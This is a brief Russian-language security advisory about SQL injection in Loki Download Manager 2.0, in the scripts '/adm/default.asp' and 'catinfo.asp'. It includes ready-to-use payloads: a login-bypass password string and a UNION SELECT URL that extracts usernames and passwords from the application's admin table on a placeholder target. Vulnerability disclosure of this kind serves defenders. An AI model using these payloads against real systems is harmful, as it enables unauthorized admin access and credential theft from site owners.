Программа: Loki Download Manager 2.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует в сценарии '/adm/default.asp' при обработке параметра password и в сценарии 'catinfo.asp' в параметре 'cat'. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
user: anyuser
pass: 'or''='
http://[target]/downmancv/catinfo.asp?cat=' union select null,null,user,null,null,null,null,null,pass,null,
null,null,null,null FROM tblAdm '
